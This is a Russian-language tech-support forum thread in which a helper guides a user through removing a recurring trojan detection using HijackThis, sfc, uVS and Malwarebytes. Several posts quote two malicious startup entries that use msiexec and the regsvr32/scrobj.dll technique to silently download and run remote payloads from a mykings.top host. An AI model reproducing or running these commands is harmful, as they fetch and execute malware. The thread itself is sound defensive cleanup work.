Михаил Ключкин Опубликовано 17 августа, 2017 Опубликовано 17 августа, 2017 (изменено) Доброго дня! Периодично KES выводит сообщение о том что найден вирус в системной памяти Trojan.Multi.WMIRun.a 17.08.2017 15:32:14 Обнаружено троянская программа Trojan.Multi.WMIRun.a System Memory Высокая Предлагает лечить, после лечения перезагружает компьютер, показывает что угроза уничтожена и все. И так в день может по несколько раз. dr web cureit не находит ничего. Полная проверка касперского тоже Где может лежать злополучный файл? или в чем может быть проблема? CollectionLog-2017.08.17-16.18.zip Изменено 17 августа, 2017 пользователем Михаил Ключкин
regist Опубликовано 17 августа, 2017 Опубликовано 17 августа, 2017 1) - Проведите эту процедуру. Полученную ссылку после загрузки карантина virusinfo_auto_имя_вашего_ПК.zip через данную форму напишите в своём в сообщении здесь. 2) "Пофиксите" в HijackThis (некоторые строки могут отсутствовать): O4 - MSConfig\startupreg: [start1] C:\Windows\system32\msiexec.exe /i http://js.mykings.top:280/helloworld.msi /q (HKLM) (2017/08/10) O4 - MSConfig\startupreg: [start] C:\Windows\system32\regsvr32.exe /u /s /i:http://js.mykings.top:280/v.sct scrobj.dll (HKLM) (2017/08/10) 3) Этот файл как понимаю знаком? D:\lombard82\ScriptForFilial.bat 4) Вставьте диск, с которого устанавливали Windows (либо другой но с той же локализацией и тем же сервис паком (SP) что установлен у вас. Если у вас windows Vista или windows 7 откройте меню "Пуск" ("Start") и в строке поиска введите "cmd". На результатах поиска нажмите правой клавишей мыши и выберите пункт "Запуск от имени администратора". Если у вас windows XP откройте меню Пуск (Start) -> Выполнить (Run) [*]Введите sfc /scannow и нажмите Энтер. [*]Система восстановит недостающие или изменённые системные файлы, для этого может потребоваться перезагрузка. [*]После того как закончится проверка в командной строке введите команду: findstr /c:"[SR]" %windir%\Logs\CBS\CBS.log>%SYSTEMDRIVE%\sfcdetails.txt[*]После выполнения вышеописанных операций в корне системного диска (тот диск,на котором установлена операционная система-как правило диск С) найдите файл sfcdetails.txt, прикрепите его к следующему сообщению. 5) Скачайте Universal Virus Sniffer (uVS) Извлеките uVS из архива или из zip-папки. Откройте папку с UVS и запустите файл start.exe. В открывшимся окне выберите пункт "Запустить под текущим пользователем". Выберите меню "Файл" => "Сохранить полный образ автозапуска". Программа предложит вам указать место сохранения лога в формате "имя_компьютера_дата_сканирования". Лог необходимо сохранить на рабочем столе. !!!Внимание. Если у вас установлены архиваторы WinRAR или 7-Zip , то uVS в автоматическом режиме упакует лог в архив, иначе это будет необходимо сделать вам вручную. Дождитесь окончания работы программы и прикрепите лог к посту в теме. !!! Обратите внимание , что утилиты необходимо запускать от имени Администратора. По умолчанию в Windows XP так и есть. В Windows Vista и Windows 7 администратор понижен в правах по умолчанию, поэтому, не забудьте нажать правой кнопкой на программу, выбрать Запуск от имени Администратора , при необходимости укажите пароль администратора и нажмите "Да" . Подробнее читайте в руководстве Как подготовить лог UVS.
Михаил Ключкин Опубликовано 21 августа, 2017 Автор Опубликовано 21 августа, 2017 1) - Проведите эту процедуру. Полученную ссылку после загрузки карантина virusinfo_auto_имя_вашего_ПК.zip через данную форму напишите в своём в сообщении здесь. http://virusinfo.info/virusdetector/report.php?md5=112A1FE8447FC8E5B58C896F7DA7F527 2) "Пофиксите" в HijackThis (некоторые строки могут отсутствовать): O4 - MSConfig\startupreg: [start1] C:\Windows\system32\msiexec.exe /i http://js.mykings.top:280/helloworld.msi /q (HKLM) (2017/08/10) O4 - MSConfig\startupreg: [start] C:\Windows\system32\regsvr32.exe /u /s /i:http://js.mykings.top:280/v.sct scrobj.dll (HKLM) (2017/08/10) Данных строк не присутствовало 3) Этот файл как понимаю знаком? D:\lombard82\ScriptForFilial.bat Да, рабочий скрипт 1с 4) Вставьте диск, с которого устанавливали Windows (либо другой но с той же локализацией и тем же сервис паком (SP) что установлен у вас. Если у вас windows Vista или windows 7 откройте меню "Пуск" ("Start") и в строке поиска введите "cmd". На результатах поиска нажмите правой клавишей мыши и выберите пункт "Запуск от имени администратора". Если у вас windows XP откройте меню Пуск (Start) -> Выполнить (Run) Введите sfc /scannow и нажмите Энтер. Система восстановит недостающие или изменённые системные файлы, для этого может потребоваться перезагрузка. После того как закончится проверка в командной строке введите команду: findstr /c:"[sR]" %windir%\Logs\CBS\CBS.log>%SYSTEMDRIVE%\sfcdetails.txt После выполнения вышеописанных операций в корне системного диска (тот диск,на котором установлена операционная система-как правило диск С) найдите файл sfcdetails.txt, прикрепите его к следующему сообщению. Во вложении файл sfcdetails 5) Скачайте Universal Virus Sniffer (uVS) Извлеките uVS из архива или из zip-папки. Откройте папку с UVS и запустите файл start.exe. В открывшимся окне выберите пункт "Запустить под текущим пользователем". Выберите меню "Файл" => "Сохранить полный образ автозапуска". Программа предложит вам указать место сохранения лога в формате "имя_компьютера_дата_сканирования". Лог необходимо сохранить на рабочем столе. !!!Внимание. Если у вас установлены архиваторы WinRAR или 7-Zip, то uVS в автоматическом режиме упакует лог в архив, иначе это будет необходимо сделать вам вручную. Дождитесь окончания работы программы и прикрепите лог к посту в теме. !!! Обратите внимание, что утилиты необходимо запускать от имени Администратора. По умолчанию в Windows XP так и есть. В Windows Vista и Windows 7 администратор понижен в правах по умолчанию, поэтому, не забудьте нажать правой кнопкой на программу, выбрать Запуск от имени Администратора, при необходимости укажите пароль администратора и нажмите"Да". Подробнее читайте в руководстве Как подготовить лог UVS. Файл лога во вложении ELIS8_2017-08-21_11-52-27 sfcdetails.txt ELIS8_2017-08-21_11-52-27.7z
Михаил Ключкин Опубликовано 22 августа, 2017 Автор Опубликовано 22 августа, 2017 что с проблемой? остается, раза 2 в день рандомно находится троян
regist Опубликовано 22 августа, 2017 Опубликовано 22 августа, 2017 C:\USERS\LOCALROOT\DESKTOP\DIALUPASS2.EXE как понимаю ваше? Строчку из отчёта, что и где находит можете сюда скопировать? + Скачайте Malwarebytes' Anti-Malware. Установите. На вкладке "Параметры" - "Личный кабинет" ("Settings" - "My Account") нажмите кнопку "Деактивировать ознакомительную Premium-версию". На вкладке "Проверка" - "Полная проверка" нажмите кнопку "Начать проверку". Дождитесь окончания проверки. Самостоятельно ничего не удаляйте!!! Нажмите кнопку "Сохранить результат - Текстовый файл (*.txt)". Имя сохраняемому файлу дайте любое, например, "scan". Отчёт прикрепите к сообщению. Подробнее читайте в руководстве.
Михаил Ключкин Опубликовано 23 августа, 2017 Автор Опубликовано 23 августа, 2017 C:\USERS\LOCALROOT\DESKTOP\DIALUPASS2.EXE как понимаю ваше? Строчку из отчёта, что и где находит можете сюда скопировать? Да, dualupass известно нам. Из какого отчета?
regist Опубликовано 23 августа, 2017 Опубликовано 23 августа, 2017 Из какого отчета? отчёта антивируса о нахождение угрозы.
Рекомендуемые сообщения
Пожалуйста, войдите, чтобы комментировать
Вы сможете оставить комментарий после входа в
Войти